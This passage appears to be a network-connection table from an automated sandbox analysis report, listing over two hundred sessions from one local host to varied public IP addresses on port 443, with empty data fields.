                                                  13469192.168.2.1358084137.51.159.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13470192.168.2.135586261.101.66.228443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13471192.168.2.1357208120.205.236.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13472192.168.2.13507368.227.234.131443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13473192.168.2.134683224.181.57.240443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13474192.168.2.1345378181.161.97.77443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13475192.168.2.1340968180.68.230.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13476192.168.2.1356826166.43.19.249443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13477192.168.2.136028097.197.79.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13478192.168.2.136078480.247.87.170443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13479192.168.2.135642436.188.192.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13480192.168.2.135948870.249.219.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13481192.168.2.134937288.253.137.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13482192.168.2.135617482.65.7.93443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13483192.168.2.135250692.96.254.249443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13484192.168.2.1342752156.77.169.131443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13485192.168.2.135702296.22.70.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13486192.168.2.1336650103.9.125.254443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13487192.168.2.1354980171.182.73.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13488192.168.2.1341172176.57.130.229443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13489192.168.2.1338848220.46.126.26443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13490192.168.2.1358494144.109.207.148443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13491192.168.2.1358128213.34.211.75443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13492192.168.2.134470489.29.88.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13493192.168.2.134686666.254.49.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13494192.168.2.1358138205.59.204.239443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13495192.168.2.1345490142.127.208.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13496192.168.2.134610038.166.127.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13497192.168.2.135627857.111.30.216443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13498192.168.2.1343020138.139.149.241443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13499192.168.2.1343506126.116.221.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13500192.168.2.1340294171.251.149.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13501192.168.2.1334652136.147.233.97443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13502192.168.2.134245881.29.83.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13503192.168.2.1334968151.28.21.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13504192.168.2.1339998212.231.59.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13505192.168.2.135853418.85.211.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13506192.168.2.1336538188.138.149.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13507192.168.2.1338590177.155.170.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13508192.168.2.135497490.7.171.54443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13509192.168.2.135165890.138.30.116443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13510192.168.2.13531782.203.126.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13511192.168.2.1349418173.11.64.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13512192.168.2.1333668153.96.122.205443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13513192.168.2.13598529.241.60.68443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13514192.168.2.1360938221.125.157.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13515192.168.2.1347920144.139.110.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13516192.168.2.136079476.180.251.139443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13517192.168.2.1355652206.34.23.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13518192.168.2.134721225.112.112.112443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13519192.168.2.1339818219.125.252.57443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13520192.168.2.1340566165.28.30.147443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13521192.168.2.1346448198.1.82.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13522192.168.2.1339782142.133.233.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13523192.168.2.135497847.155.24.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13524192.168.2.1333704102.90.35.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13525192.168.2.135613078.216.166.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13526192.168.2.133596874.84.158.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13527192.168.2.1334410200.123.91.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13528192.168.2.1342468200.113.5.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13529192.168.2.13484902.136.68.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13530192.168.2.1360660166.77.198.218443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13531192.168.2.1341716160.189.96.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13532192.168.2.1341804136.200.193.104443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13533192.168.2.1351848194.119.231.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13534192.168.2.1342228100.242.145.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13535192.168.2.1342594159.27.228.203443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13536192.168.2.1349372155.231.234.201443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13537192.168.2.133634265.27.57.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13538192.168.2.1345896149.85.210.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13539192.168.2.133322445.60.226.119443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13540192.168.2.136003657.182.70.20443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13541192.168.2.133543442.234.38.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13542192.168.2.1333542126.122.10.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13543192.168.2.13424241.205.239.65443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13544192.168.2.135590490.129.52.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13545192.168.2.133863461.185.74.90443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13546192.168.2.1353654138.26.3.149443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13547192.168.2.1343606130.32.123.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13548192.168.2.1347362162.212.225.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13549192.168.2.135016061.114.109.184443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13550192.168.2.1353324187.41.40.209443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13551192.168.2.1355236114.27.119.18443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13552192.168.2.13561648.87.233.116443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13553192.168.2.1352250217.109.232.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13554192.168.2.1342334137.105.64.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13555192.168.2.133380697.125.195.119443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13556192.168.2.134872620.50.157.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13557192.168.2.1340548184.112.176.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13558192.168.2.1342404150.119.74.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13559192.168.2.133686636.16.83.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13560192.168.2.1342356120.138.151.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13561192.168.2.133962663.165.85.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13562192.168.2.1343276175.130.64.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13563192.168.2.133328468.53.237.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13564192.168.2.1345868210.3.214.171443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13565192.168.2.1348868185.212.96.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13566192.168.2.1339566168.14.212.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13567192.168.2.133583263.147.134.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13568192.168.2.1338218191.46.13.142443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13569192.168.2.1357420117.122.208.235443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13570192.168.2.1352140188.215.65.186443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13571192.168.2.1339000216.242.144.81443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13572192.168.2.134425868.4.42.157443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13573192.168.2.1344078117.5.28.106443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13574192.168.2.1360150150.136.45.57443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13575192.168.2.1355164217.95.81.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13576192.168.2.1345544216.28.1.41443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13577192.168.2.1335890200.84.205.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13578192.168.2.134510039.207.150.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13579192.168.2.1353424107.163.28.24443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13580192.168.2.134021642.84.233.207443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13581192.168.2.1339818145.134.235.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13582192.168.2.133447666.171.18.102443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13583192.168.2.1333156115.248.35.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13584192.168.2.135622875.32.178.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13585192.168.2.135411213.87.106.35443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13586192.168.2.134990841.95.177.192443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13587192.168.2.135420090.200.251.86443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13588192.168.2.134927872.134.25.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13589192.168.2.133377012.211.170.3443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13590192.168.2.133772827.228.140.249443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13591192.168.2.134981291.185.78.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13592192.168.2.1339164187.76.238.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13593192.168.2.1359132107.227.174.74443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13594192.168.2.1336344122.249.175.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13595192.168.2.1336154134.41.236.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13596192.168.2.1348694107.34.158.124443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13597192.168.2.135520677.212.248.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13598192.168.2.1344738141.63.119.103443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13599192.168.2.135510068.96.247.83443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13600192.168.2.1344900119.247.11.70443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13601192.168.2.134412083.218.125.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13602192.168.2.1343832147.82.99.62443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13603192.168.2.1344370220.152.183.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13604192.168.2.1348086151.208.85.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13605192.168.2.1349740136.176.142.125443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13606192.168.2.1347824111.99.30.154443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13607192.168.2.1338938148.184.251.167443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13608192.168.2.133805293.219.202.177443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13609192.168.2.1345142175.179.146.184443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13610192.168.2.1355886188.126.232.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13611192.168.2.136008088.147.219.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13612192.168.2.1335688164.181.64.43443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13613192.168.2.1344290208.128.248.253443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13614192.168.2.1353746188.24.223.186443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13615192.168.2.1348272118.198.112.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13616192.168.2.1345382121.207.184.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13617192.168.2.135196889.213.133.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13618192.168.2.1347984158.111.147.176443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13619192.168.2.1357126149.58.10.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13620192.168.2.1358296102.195.44.16443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13621192.168.2.135164231.62.179.114443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13622192.168.2.13609609.59.246.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13623192.168.2.135088457.87.57.7443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13624192.168.2.1336334130.221.192.94443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13625192.168.2.1348850191.107.4.89443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13626192.168.2.1349026163.200.250.202443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13627192.168.2.1347714107.16.83.47443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13628192.168.2.1360524186.131.0.208443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13629192.168.2.1352286197.90.210.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13630192.168.2.1346810210.172.58.101443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13631192.168.2.1356420140.110.67.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13632192.168.2.1356630168.238.25.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13633192.168.2.1353072131.240.111.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13634192.168.2.135158893.137.220.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13635192.168.2.135382476.32.60.219443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13636192.168.2.134314659.79.75.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13637192.168.2.135362057.239.179.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13638192.168.2.1337680186.148.146.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13639192.168.2.1341922223.219.244.90443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13640192.168.2.1335182213.178.243.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13641192.168.2.1337168188.140.27.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13642192.168.2.1350862162.103.173.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13643192.168.2.1346866196.149.214.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13644192.168.2.13600021.204.118.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13645192.168.2.1339864203.99.147.116443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13646192.168.2.1360434184.120.41.121443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13647192.168.2.1352024157.223.231.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13648192.168.2.1349406217.20.202.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13649192.168.2.135766676.224.177.183443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13650192.168.2.1360298210.131.36.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13651192.168.2.133938414.210.130.176443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13652192.168.2.1359460118.91.52.37443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13653192.168.2.13459022.210.234.184443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13654192.168.2.1353722159.27.35.39443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13655192.168.2.1335074128.95.204.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13656192.168.2.1338490219.230.224.227443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13657192.168.2.135379665.191.52.108443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13658192.168.2.1345300141.251.194.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13659192.168.2.1343632153.182.78.178443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13660192.168.2.1355042142.200.241.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13661192.168.2.135647432.246.242.144443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13662192.168.2.1350190192.152.34.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13663192.168.2.1343978194.176.4.218443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13664192.168.2.1346714103.169.158.173443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13665192.168.2.1341982160.24.239.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13666192.168.2.1357416131.159.248.134443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13667192.168.2.1351670184.199.131.165443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13668192.168.2.134656651.125.190.48443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13669192.168.2.135967653.136.224.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13670192.168.2.1351110189.41.53.99443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13671192.168.2.135267038.22.198.120443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13672192.168.2.135167043.60.144.82443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13673192.168.2.1355372211.202.4.13443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13674192.168.2.1354162172.58.251.124443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13675192.168.2.1339402202.236.129.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13676192.168.2.1345312220.23.2.30443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13677192.168.2.133580052.97.228.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13678192.168.2.135091643.191.163.22443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13679192.168.2.1340270104.27.196.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13680192.168.2.1346790132.164.228.92443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13681192.168.2.1335402210.77.227.154443
